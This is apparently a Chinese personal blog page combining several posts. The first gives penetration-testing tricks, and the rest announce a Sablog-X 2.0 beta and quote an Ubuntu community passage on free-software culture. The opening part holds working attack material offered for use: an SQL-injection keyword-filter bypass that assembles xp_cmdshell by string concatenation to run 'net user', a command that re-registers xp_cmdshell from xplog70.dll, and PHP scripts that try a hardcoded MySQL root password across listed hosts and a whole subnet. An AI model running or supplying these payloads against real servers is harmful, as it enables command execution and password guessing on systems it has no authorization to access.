declare、xp_、sp_、select、update、insert等关键词被过滤了。幸好单引号没有过滤。拨开云雾见明月啊。

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

当xp_被过滤了，declare也被过滤了。什么鸟关键字都被过滤了。试试下面的办法。也许会柳暗花明又一村。。

EXEC master.dbo.sp_addextendedproc 'abc','xplog70.dll'

昨日渗透时 ， 整段都是MYSQL服务器。在某个WEB下。用如下脚本来猜了一下MYSQL密码。还真有两个。在WEB下用脚本来弄也方便快捷。MSSQL的同理。。

这个是已知开了3306的。。

<?php

$hostdb = array(
	'192.168.168.10',
	'192.168.168.20',
	'192.168.168.20',
	'192.168.168.40',
	'192.168.168.50',
	'192.168.168.60',
	'192.168.168.70',
	'192.168.168.80',
	'192.168.168.90',
	'192.168.168.100'
);

$dbu = 'root';
$dbp = '1qaz2wsx';

foreach ($hostdb as $host) {
	if(@mysql_connect($host, $dbu, $dbp)) {
		echo $host.' - '.$dbu.' - '.$dbp.' ... OK<br>';
	}
}

echo 'done.';

?>

举一反三，这是全段猜的。

<?php

$ips = '192.168.168.';
$dbu = 'root';
$dbp = '1qaz2wsx';

for ($i=1; $i<254; $i++) {
	if(@mysql_connect($ips.$i, $dbu, $dbp)) {
		echo $ips.$i.' - '.$dbu.' - '.$dbp.' ... OK<br>';
	}
}

echo 'done.';

?>

老婆放假了。太开心了。为了庆祝一下。决定发布最新的sablog-x 2.0测试版。

也许还有很多人性化方面值得改进（这个是肯定的）。Sablog-X 2.0 Beta(20100121)并不是2.0最终版本。但是数据结构基本不会再有大的动作。

众多2.0版本中也存在数据结构的变化。如果是我之前给的或者是网上泄露的版本升级。请来信或QQ咨询我数据表的转换以及升级注意事项。

针对Sablog-X 2.0 Beta(20100121)的改进

1. 修正：普通用户登录后显示无权限的BUG
2. 改进：评论翻页直接跳到评论部分

最近在看Ubuntu中文社区。发现有这么一段话：

---------------------------- 可爱的分割线 ---------------------------

不要用商业的眼光来看 Linux。

Linux 不是商业软件，所以不要用要求 Solaris, Windows 那样的眼光来看 Linux. 自由软件的作者们从来不拉拢用户，他们对用户不负有任何责任。实际上在自由软件的世界里，“开发者”和“用户” 并没有明确的界限，大家是朋友。

自由软件很可能只是满足作者和他的朋友的需要，甚至是为了好玩而创造的。自由软件不是完美的，自由软件承认自己有缺点，它不会自吹自擂，蒙蔽“用户”的耳目。这种对作者责任的解脱激发了作者的创造力，他们不用过分考虑“向上兼容”，他们往往比背上重重包袱的商业软件结构更合理，技术更先进。

所以当你用某个自由软件遇到困难的时候，不应该埋怨软件的作者，因为他们对你并没有义务。你不应该把自己当成一个挑剔的顾客，而要把自己作为这个软件的顾问和一个和蔼的建议者，这样你才能理解作者写这个程序时的快乐，在遇到问题时向作者反映，帮助他完善这个软件，成为一个快乐的参与者。就像你的哥哥送你一个他用旧了的自行车，你应该珍惜这份友情，而不要在车坏了，或者骑车摔了一交的时候大骂你的哥哥。如果你真的不能使用这种合作的心态，那么最好不要使用这个软件。

这是一种先进的文化，它包含了互相合作，科学创新的精神。理解这一点不是很容易，很多人往往是因为不能理解这种文化而离开自由软件。这对于作者来说并没有什么损失。

---------------------------- 可爱的分割线 ---------------------------

我发现这句话。好像蛮多地方还挺适用于Sablog-X的。